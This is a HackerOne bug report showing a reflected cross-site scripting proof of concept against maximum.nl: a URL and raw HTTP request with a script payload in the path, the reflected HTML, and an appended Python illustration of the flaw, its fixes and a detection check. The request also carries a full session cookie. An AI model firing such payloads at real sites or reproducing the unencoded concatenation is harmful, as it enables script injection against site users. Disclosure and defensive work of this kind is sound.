Maximum: Cross-site Scripting (XSS) on [maximum.nl]

2017-05-12T19:17:58
ID H1:228006
Type hackerone
Reporter 0xradi
Modified 2017-05-24T09:08:59

Description

POC:

By visiting the following URL: https://maximum.nl/"><script>prompt("exr")</script><!--/index.php

Or performing the following request:

```http
GET /"><script>prompt("exr")</script><!--/index.php HTTP/1.1
Host: maximum.nl
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: laravel_session=eyJpdiI6Im94Uk52NHpxc3VKcFRoMThqRXZlRGc9PSIsInZhbHVlIjoiUWlqNk10dHNFclRcL1ZNNHJFWlZLWHhTQkNWbmlQd1pEMkFrRkJNSVpKYVlTajlLSlwvUllwWEhCYTNzckMzUVM2OVlkUStcL1BBbnVxMjVtcm51YUowdXc9PSIsIm1hYyI6ImRjMGYxNWFiNzE3MjZjYWMxOTdhY2EyMmVhYjhmYjE2ZTQyMTczYzk4Yjg2ODdlN2I0ZGY3NzgyMzFmM2YxODMifQ%3D%3D; _ga=GA1.2.1741493924.1494610209; _gid=GA1.2.1226624986.1494612538; _vwo_uuid_v2=58B280465974A9FE1B5DAF8815EA2396|02b9c0669e36dd7cd59d4a7a29ab29ef
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```

On Firefox, the JavaScript code injected inside the payload is correctly executed, as shown in the following snippet of the response and in the attached screenshot F184157.

```html
<meta property="og:image" content="https://maximum.nl/"><script>prompt("exr")</script><!--/images/logo-maximum.png" />

<title>
  Employer Branding - Directe werving - Retentie | Maximum
</title>

<link rel="shortcut icon" href="https://maximum.nl/"><script>prompt("exr")</script><!--/favicon.ico">

<link media="all" type="text/css" rel="stylesheet" href="https://maximum.nl/&quot;&gt;&lt;script&gt;prompt(&quot;exr&quot;)&lt;/script&gt;&lt;!--/css/main.css?1490352453">
```

Best Regards, @exr
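The response above shows the request path (everything before `/index.php`) being reused as the site's base URL and concatenated, unencoded, into the `og:image` and favicon attributes, while the stylesheet `href` came out entity-encoded and therefore inert. The following Python is an added illustration of that pattern and of the two fixes (attribute-context encoding, and building absolute URLs from configuration rather than from the request); it is not code from the report or from the site, and the base-URL derivation it models is an assumption that merely reproduces the shown output.

```python
import html
import re

# Constructed sample input: the request path from the report's PoC.
POC_PATH = '/"><script>prompt("exr")</script><!--/index.php'
# Hypothetical configured origin (for example an application URL setting);
# it is never read from the incoming request.
CONFIGURED_ORIGIN = "https://maximum.nl"


def attr(value: str) -> str:
    """Encode a value for an HTML attribute context (quote=True also encodes '"')."""
    return html.escape(value, quote=True)


def base_url_from_request(host: str, path: str) -> str:
    """Assumed (hypothetical) mechanism that reproduces the report's response:
    the base URL is guessed as scheme + host + whatever precedes '/index.php'
    in the request path, so attacker-controlled path text lands in every
    absolute URL the page builds."""
    base_path = path.split("/index.php", 1)[0]
    return f"https://{host}{base_path}"


def render_head_vulnerable(host: str, path: str) -> str:
    """Raw concatenation: '"' closes the attribute, '>' closes the tag,
    '<!--' comments out the remainder of the original element."""
    base = base_url_from_request(host, path)
    return (f'<meta property="og:image" content="{base}/images/logo-maximum.png" />\n'
            f'<link rel="shortcut icon" href="{base}/favicon.ico">')


def render_head_escaped(host: str, path: str) -> str:
    """Same untrusted base URL, but output-encoded, matching how the
    stylesheet href appeared in the report (&quot;&gt;&lt;script&gt;...)."""
    base = base_url_from_request(host, path)
    return (f'<meta property="og:image" content="{attr(base + "/images/logo-maximum.png")}" />\n'
            f'<link rel="shortcut icon" href="{attr(base + "/favicon.ico")}">')


def render_head_hardened() -> str:
    """Defence in depth: absolute URLs come from configuration, so request
    data never reaches the template, and output is still encoded."""
    return (f'<meta property="og:image" content="{attr(CONFIGURED_ORIGIN + "/images/logo-maximum.png")}" />\n'
            f'<link rel="shortcut icon" href="{attr(CONFIGURED_ORIGIN + "/favicon.ico")}">')


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def has_injected_script(markup: str) -> bool:
    """Template regression check: the head never legitimately emits <script>,
    so finding one means reflected input bypassed encoding."""
    return SCRIPT_TAG.search(markup) is not None
```

Wiring `has_injected_script` into a template test with a hostile path like `POC_PATH` catches a regression before it reaches production.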